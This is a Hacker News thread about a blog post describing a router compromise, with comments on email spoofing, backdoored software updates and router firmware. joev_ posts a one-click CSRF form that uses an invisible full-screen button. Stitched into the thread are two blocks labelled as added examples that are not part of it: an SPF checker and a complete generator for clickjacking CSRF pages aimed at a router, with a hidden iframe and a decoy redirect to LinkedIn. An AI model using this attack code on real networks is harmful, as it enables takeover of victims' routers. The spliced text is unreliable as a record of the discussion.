
How I Hacked a Router - jackpea
http://disconnected.io/2014/03/18/how-i-hacked-your-router/
======
ushi
Interesting read. One thing I do not understand is why software
updates/packages are still not cryptographically signed. It's a common thing
on Linux. Notepad++ provides checksums[0] for their packages - so (i assume)
they are actually aware of the problem.

[0] [http://sourceforge.net/p/notepad-plus/discussion/1290588](http://sourceforge.net/p/notepad-plus/discussion/1290588)

~~~
revelation
It's common on Linux because they use package managers where you only have to
implement that functionality once. Every PoS app on Windows and OSX has its
own update process, which mostly is just downloading and running the new setup
binary.

This happens even with software where you would think the manufacturer is
aware of this kind of problem. 1Password downloaded updates over HTTP for a
long time, then switched to HTTPS and failed to check certificates. When they
finally started to check if binaries are signed (Windows provides for that),
they didn't change keys so you could downgrade to a previous version that
didn't. That is just one application.

~~~
kalleboo
> Every PoS app on Windows and OSX has its own update process, which mostly is
> just downloading and running the new setup binary.

Most OS X apps use either the Mac App Store, which signs everything, or
Sparkle[0], which last time I used it made it really hard to use it without
signing things. It's only stuff from big vendors like Adobe and Microsoft who
do custom stuff you can't really trust.

[0] [http://sparkle.andymatuschak.org](http://sparkle.andymatuschak.org)

------
jlgaddis
While this is an interesting article and this is certainly feasible, I'm left
with the opinion that this is fiction and didn't actually happen.

~~~
sillysaurus3
Would anyone give a more in-depth comment regarding why this didn't happen?

~~~
EvanAnderson
I find it hard to believe that an infosec professional would click a link in
an email. Anybody who has ever run a phishing campaign as part of a pentest
wouldn't. I only moonlight in the infosec industry, but I know that the Right
Thing, upon receiving an unsolicited notification email from a website
("Friend" request, LinkedIn connection requests, "Track a package", etc) is to
visit the site in your browser manually, versus clicking some link in an email
that could likely be bogus.

------
siliconc0w
Everything is feasible except the faked linkedin email - it wouldn't pass SPF
and so I'm pretty sure gmail would junk it.

~~~
thaumaturgy
Well, I was all set to explain that SPF only checks the envelope sender, not
the from: address header that is displayed to the user.

Then I decided to test it, and in fact Gmail does seem to be doing more than
that. I ran a two-line script as root from my mail server to send a message
with an envelope-sender from my domain (which has a basic SPF txt record in
its DNS) and a from: header from LinkedIn, and Gmail spit it back at my return
address a moment later saying that it smelled like spam. So, good for Gmail!

But, I don't think this is common behavior, and the article doesn't actually
say that the target has a Gmail account.
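
The distinction thaumaturgy is testing above, as an added example that is not part of the thread: SPF is evaluated against the envelope sender (MAIL FROM / Return-Path) and the connecting IP, not against the From: header the mail client displays. The DNS data is constructed; the linkedin.com record and the noreply address are assumptions for the example, not LinkedIn's real record or sender. The second check adds the requirement that the From: header domain match the domain that passed SPF, which is what DMARC formalizes as alignment; the thread does not say whether that is exactly what Gmail did, only that Gmail did more than plain SPF.

```javascript
// Added example, not code from the thread: why an SPF-only check passes the spoofed
// message thaumaturgy describes, and what a header-alignment check adds.
// DNS data is constructed; the linkedin.com record below is assumed, not the real one.

const TXT_RECORDS = {
  "attacker.example": ["v=spf1 ip4:203.0.113.10 -all"],
  "linkedin.com": ["v=spf1 ip4:198.51.100.0/24 -all"], // assumption for the example
};

function ip4ToInt(ip) {
  return ip.split(".").reduce((acc, oct) => ((acc << 8) | Number(oct)) >>> 0, 0);
}

function ip4InCidr(ip, cidr) {
  const [net, bits = "32"] = cidr.split("/");
  const n = Number(bits);
  const mask = n === 0 ? 0 : (0xffffffff << (32 - n)) >>> 0;
  return ((ip4ToInt(ip) & mask) >>> 0) === ((ip4ToInt(net) & mask) >>> 0);
}

// Minimal SPF evaluator: only "ip4:" and "all" mechanisms, with +, -, ~, ? qualifiers.
function checkSpf(domain, clientIp) {
  const record = (TXT_RECORDS[domain] || []).find((r) => r.startsWith("v=spf1"));
  if (!record) return "none";
  const verdict = { "+": "pass", "-": "fail", "~": "softfail", "?": "neutral" };
  for (const term of record.split(/\s+/).slice(1)) {
    const qualifier = "+-~?".includes(term[0]) ? term[0] : "+";
    const mech = term.slice(qualifier === term[0] ? 1 : 0);
    if (mech === "all") return verdict[qualifier];
    if (mech.startsWith("ip4:") && ip4InCidr(clientIp, mech.slice(4))) return verdict[qualifier];
    // other mechanisms (a, mx, include, ...) are not modelled here
  }
  return "neutral";
}

// Pull the bare domain out of "Name <user@domain>" or "user@domain".
function domainOf(addr) {
  const m = addr.match(/<([^>]+)>/);
  const bare = (m ? m[1] : addr).trim();
  return bare.slice(bare.lastIndexOf("@") + 1).toLowerCase();
}

// SPF proper: only the envelope sender (MAIL FROM / Return-Path) and the client IP.
function spfOnlyVerdict(msg) {
  return checkSpf(domainOf(msg.envelopeFrom), msg.clientIp);
}

// Stricter: SPF must pass AND the From: header domain must match the domain that
// passed. This alignment requirement is what DMARC adds on top of SPF.
function alignedVerdict(msg) {
  const spf = spfOnlyVerdict(msg);
  const aligned = domainOf(msg.headerFrom) === domainOf(msg.envelopeFrom);
  return spf === "pass" && aligned ? "pass" : "fail";
}

// Constructed message mirroring the test in the thread: a legitimate envelope sender
// from the attacker's own SPF-covered domain, with a spoofed LinkedIn From: header
// (the noreply address is illustrative, not a real LinkedIn sender).
const SPOOFED_MESSAGE = {
  clientIp: "203.0.113.10",
  envelopeFrom: "bounce@attacker.example",
  headerFrom: "LinkedIn <noreply@linkedin.com>",
};

// Spoofing the envelope sender too is caught by SPF alone: the attacker's server
// is not in the (assumed) linkedin.com record.
const ENVELOPE_SPOOFED_MESSAGE = { ...SPOOFED_MESSAGE, envelopeFrom: "bounce@linkedin.com" };

console.log("SPF only:", spfOnlyVerdict(SPOOFED_MESSAGE));   // pass
console.log("aligned: ", alignedVerdict(SPOOFED_MESSAGE));   // fail
console.log("envelope spoofed, SPF only:", spfOnlyVerdict(ENVELOPE_SPOOFED_MESSAGE)); // fail
```

The point jwcrux raises in the reply below comes out in the last line: spoofing the envelope sender as well does get stopped by SPF, which is why the interesting case is the one where the envelope is honest and only the displayed From: is forged.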

~~~
jwcrux
Sure - SPF may very well only check the envelope sender, but isn't that
usually plenty? If you can't spoof the Linkedin envelope sender, and the mail
goes to SPAM, who cares if the From: address is spoofed? The user likely won't
see it anyway.

~~~
thaumaturgy
Anybody that can run sendmail as root (or use an alternate program, or compile
their own) can spoof the envelope sender.

~~~
jwcrux
Ah, gotcha. You're saying that you sent an email with a valid envelope sender
from your domain, with only a spoofed From: address, and gmail sent it back.
If so, nice!

~~~
thaumaturgy
Yep, exactly.

------
svas
Curious how the author knew to seed the backdoor'ed Notepad++ _before_ Bill
clicked the link?

I suppose you could just serve up a fake backdoor program for every *.exe\msi
download, and remove the honeypot on the second download? The first download
would execute and maybe do nothing (or error) - prompting a second download
which led to the real thing.

~~~
lambda
In the article, he mentions using Evilgrade to do the backdooring. If you
click though the link, you can find the README, which lists a bunch of
applications that Evilgrade supports seeding backdoored versions of
[http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt](http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt)

He likely just enabled them all, or at least enabled several which are likely
candidates for his target to download.

------
ivan_ah
Okay so OpenWRT stopped being optional now...

Any hardware recommendations for what I should look in for in a router? Is old
better than new? Any particular model that is well supported?

~~~
fiatmoney
Ubiquiti AirRouter or AirRouter HP. Almost all Ubiquiti gear works completely
transparently with OpenWRT, out of the box. In fact their stock firmware is
built on top of OpenWRT.

~~~
ivan_ah
Just wanted to thank you for the recommendation. New AirRouter is working
great. I even set the power level down because I have pretty good connection
everywhere in the house.

------
ambrop7
"It took about a week before Bill decided to upgrade notepad++ to the new
version."

Which is why I'm always wary of installing unsigned software. In such cases I
try to check some hashes some way. Obviously if the download page lists them I
check against those, but in most cases it's insufficient because that page is
not HTTPS. So I always help myself with google, both by googling the filename
to find some pages listing a hash, and by googling my own hash (note that
Google is accessed with HTTPS).

~~~
why-el
I didn't understand which hashes you are talking about. Do installs usually
provide a checksum or? I have not found any that do, or maybe I just ignore
it.

~~~
ambrop7
The hashes of downloaded files, computed locally. E.g. with 'sha1sum' command
or Microsoft's 'fciv'.

Suppose I download Putty and am unsure of whether it's the real thing or
whether it's a Trojan, e.g. due to someone having hacked my router. I compute
the hash of the file and google it:
[http://lmgtfy.com/?q=44ac2504a02af84ee142adaa3ea70b868185906...](http://lmgtfy.com/?q=44ac2504a02af84ee142adaa3ea70b868185906f)
. I find many sites saying that's putty.exe. If I didn't, I'd be very
suspicious.

------
refurb
I'm curious how the email attack worked, don't most web-based email services
flag emails that come from one domain, but contain a link to another?

~~~
meowface
Yes, they should. I'd be curious to hear more details about that.

I'd also like to know what domain was used for phishing, since you would think
an infosec guy would either hover over the button/link before clicking, or get
suspicious when he sees his browser load a site that isn't linkedin.com before
redirecting.

~~~
batuhanicoz
But if you control the DNS, you can serve a fake LinkedIn from linkedin.com.
Can't do https though.

Edit: Ignore it, I forgot he didn't control the DNS at that point. So this is
invalid.

~~~
btown
Note that at that point in the attack, he had not yet gained access to the
router, so he didn't control DNS yet.

~~~
batuhanicoz
Oh yes, I missed that fact. Sorry.

------
quackerhacker
Maybe some NetSec guys could answer this please. What would happen with his
update to Notepad++? Would it still update the package?

Even if the target set his computer to auto-update (or something that did not
require admin authentication), wouldn't he have some type of notion that
something went wrong during his update?

With the target being an InfoSec guy, I would've imagined he would at least be
running some type of network monitoring, like wireshark or little snitch,
_ESP_ on his personal computer. Wouldn't he have to authorize the outgoing
packets?

Sorry, if I come off analytical to the story...it's a great read...I just want
to make sure my networks are locked down. I've even gone as far as dedicated
networks for my server and home usage, and preventing internal ip addresses
from communicating to each other (sucks for airplay).

~~~
ma2rten
_Wouldn't he have some type of notion that something went wrong during his
update?_

There is a way of injecting your code into an existing executable so that the
executable still works like it did before. Basically your code gets called
first and then the original program entry point gets called.

_Wouldn't he have to authorize the outgoing packets?_

He might have updated this Notepad++ on purpose? He obviously did not know his
router was compromised.

~~~
quackerhacker
Thank you. You helped me realize that even if the target had wireshark or
little snitch, the router was acting as the MITM since the packets would
piggyback on outgoing requests that appeared normal cause of the router's DNS
settings.

I was trying to figure out how he had the key logger sending out its packets.

------
userbinator
tl;dr: Social engineering won. It was over the moment he got tricked into
clicking on a link in an email.

~~~
frozenport
So we live in a world where you can browse to a page and have your network
compromised? Consider reading the story.

~~~
userbinator
I did. He couldn't attack the router from outside, he had to get his victim to
do it from within the network.

~~~
teacup50
No, he just had to get the victim to visit a web page he controlled. That's
barely social engineering.

------
pcunite
Sweet story ... and another vote for MikroTik routers for personal use.

~~~
jlgaddis
I'd go along with that, assuming that RouterOS is replaced by OpenWRT or
FreeBSD.

~~~
krick
Do you think configuring OS for your router manually would leave less chance
for it to be broken? I suspect I'd leave more holes setting up all the stuff
myself, than relying on MikroTik folks knowledge.

Besides, are there some step-by-step guides/checklists that would help build
secure environment for your router/PC?

~~~
jlgaddis
I should probably say that I have a dislike of (and am biased against)
MikroTik because of their disregard of the GPL. For the price, though, I think
the hardware is generally pretty decent.

Anyway, I don't feel real confident in the security of the RouterOS software
although I don't have any hard or articulable reasons for that. It's just a
"gut feeling", I suppose.

I do have much more confidence in both OpenWRT and FreeBSD. If you're just
using the device as a home router/firewall, you don't really need many (if
any) daemons running and exposed, so the attack surface is pretty minimal.
My own router at home came with RouterOS on it (although it's not MikroTik
hardware) but I replaced it with OpenBSD.

------
k_os
I guess it's a good thing I have my laptop set up to use google's dns no matter
what network I'm on.

~~~
beagle3
Not really. Control of the router (of the kind he describes) can set up
routing in such a way that it still goes to system under his control. It's
easiest if he can get a shell with access to (e.g.) iptables, but even without
a shell, it's possible to set up routing to do that.

------
prez
Doesn't the target need to have an active router admin session for the CSRF to
work?

Unless I'm missing something...

~~~
pizzeys
I don't know about this specific bug, but there have been consumer router
bugs before (Netgear specifically) where not only were they vulnerable to
CSRF, but authentication bypass at the same time if the request was crafted
carefully.

------
yp_master
How about using Soekris or Alix for a router instead of Netgear?

------
frozenport
If you use a different firmware, would your problem be fixed?

------
icebraining
One more reason to use NoScript - it would have made the CSRF significantly
harder to pull off. And a reason to use an OS with a proper package manager,
of course ;)

~~~
joev_
Not really. Depending on the protocol, CSRFs are often an easy 1-click exploit
on noscript-enabled browsers. Something like this:

    
    
        <!-- enctype=text/plain sends each field as name=value with no URL-encoding,
             so the body opens with an XML comment that swallows the "=" and is
             followed by the SOAP payload, which the router's parser reads as-is.
             The transparent submit button covers the viewport, so the first click
             anywhere submits the form without any JavaScript. -->
        <form enctype='text/plain' method=post action='http://192.168.1.1/vulnerable'>
          <input type='hidden' name="<!--" value="--> <SOAP...>" />
          <input type='submit' value="submit" style="position:fixed;top:0;left:0;width:1200px;height:1200px;background:#000;opacity:0;" />
        </form>
    

Is the corresponding 1-click that works on noscript.

~~~
icebraining
Hmm, I thought ClearClick would catch that, but apparently it doesn't. That's
unnerving. Even ABE lets it through.

That said, it would still require the victim to load the fake LinkedIn page
(with the wrong domain), which is more likely to look suspicious.

And it would've loaded the router page after the POST (instead of redirecting
to LinkedIn), which would _definitively_ signal that something was wrong.

~~~
joev_
Nah, you just set target="iframe name" on the form and post into a (hidden)
iframe. Then in 2 seconds you redirect to LinkedIn. In my experience, getting
clicks from targets is easy. One simple way is to show a page with a single
link that just says "Redirecting". After a moment most users will just click
the link.
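
The two halves of joev_'s technique put together, as an added example that is not code from the thread: the text/plain encoding trick from the first snippet, plus the hidden-iframe target and delayed redirect from the reply above. `http://192.168.1.1/vulnerable`, the SOAP envelope and the LinkedIn URL are placeholders, as in the original; no real router endpoint is implied. The first function reproduces what the browser sends for an `enctype="text/plain"` form, which is the part worth seeing: the field name `<!--` and a value starting with `-->` turn the mandatory `name=value` into an XML comment wrapped around the `=`.

```javascript
// Added example, not code from the post: a one-click CSRF page that posts into a hidden
// iframe and then redirects, as joev_ describes. Endpoint, payload and redirect target
// are placeholders.

// Reproduce the browser's enctype="text/plain" encoding: each field becomes
// "name=value" followed by CRLF, with no URL-encoding of either part.
function textPlainBody(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// What the router's XML parser effectively sees: comments dropped, payload kept.
function stripXmlComments(body) {
  return body.replace(/<!--[\s\S]*?-->/g, "").trim();
}

function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

function csrfPage({ action, soap, redirectTo, delayMs = 2000 }) {
  const fields = [["<!--", "--> " + soap]];
  const inputs = fields
    .map(([n, v]) => `  <input type="hidden" name="${escapeAttr(n)}" value="${escapeAttr(v)}">`)
    .join("\n");
  // target="f" sends the POST response into the hidden iframe, so the tab never shows the
  // router's reply. The transparent submit button covers the viewport, so the first click
  // anywhere (for instance on the visible "Redirecting" link) submits the form with no
  // JavaScript at all; where scripts do run, onsubmit redirects after delayMs.
  return `<!doctype html>
<html><body>
<iframe name="f" style="display:none"></iframe>
<form target="f" enctype="text/plain" method="post" action="${escapeAttr(action)}"
      onsubmit="setTimeout(function(){location.href=${escapeAttr(JSON.stringify(redirectTo))}},${delayMs})">
${inputs}
  <input type="submit" value="submit"
         style="position:fixed;top:0;left:0;width:1200px;height:1200px;background:#000;opacity:0;">
</form>
<p><a href="${escapeAttr(redirectTo)}">Redirecting...</a></p>
</body></html>`;
}

// Constructed placeholder payload; a real one would be the router's SOAP request.
const SOAP = "<Envelope><Body><Action/></Body></Envelope>";

const PAGE = csrfPage({
  action: "http://192.168.1.1/vulnerable",
  soap: SOAP,
  redirectTo: "https://www.linkedin.com/",
});

// The request body the router receives when the form is submitted:
const BODY = textPlainBody([["<!--", "--> " + SOAP]]);

console.log(BODY);                  // "<!--=--> <Envelope>...</Envelope>\r\n"
console.log(stripXmlComments(BODY)); // the bare SOAP envelope
console.log(PAGE);
```

The point icebraining raised about the router page appearing after the POST is handled by `target="f"`; the only thing the victim sees is the page they were already on and then the redirect. Without JavaScript the POST still happens on the click, only the automatic redirect does not, and the "Redirecting" link is there for that case.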

------
conchy
How much harder would this attack have been with a fully patched OSX Mavericks
target and an Apple Time Capsule router?

~~~
IgorPartola
Well, if his password was weak, easier than TFA.

I don't know about the vulnerabilities in the Time Capsule router, but from my
understanding the only router firmware even remotely worth a look in terms of
security would be OpenWRT.

~~~
conchy
My cursory search suggests that it may be pretty secure:
[http://www.cvedetails.com/vulnerability-list/vendor_id-49/product_id-18927/Apple-Time-Capsule.html](http://www.cvedetails.com/vulnerability-list/vendor_id-49/product_id-18927/Apple-Time-Capsule.html)

but I figured I should ask this guy, sounds like he knows what he's doing.

------
zurn
This doesn't sound like a router. Maybe a home wifi ap / NAT box?

------
CodeGlitch
So why was 'Bill' - an infosec expert - running Windows?

------
tsmash
Which one do you think will happen first: This guy goes to jail, or this guy
gets a job offer?

~~~
csears
Why would he go to jail? The guy's friend asked for the pentest. There was no
"unauthorized access" involved here.

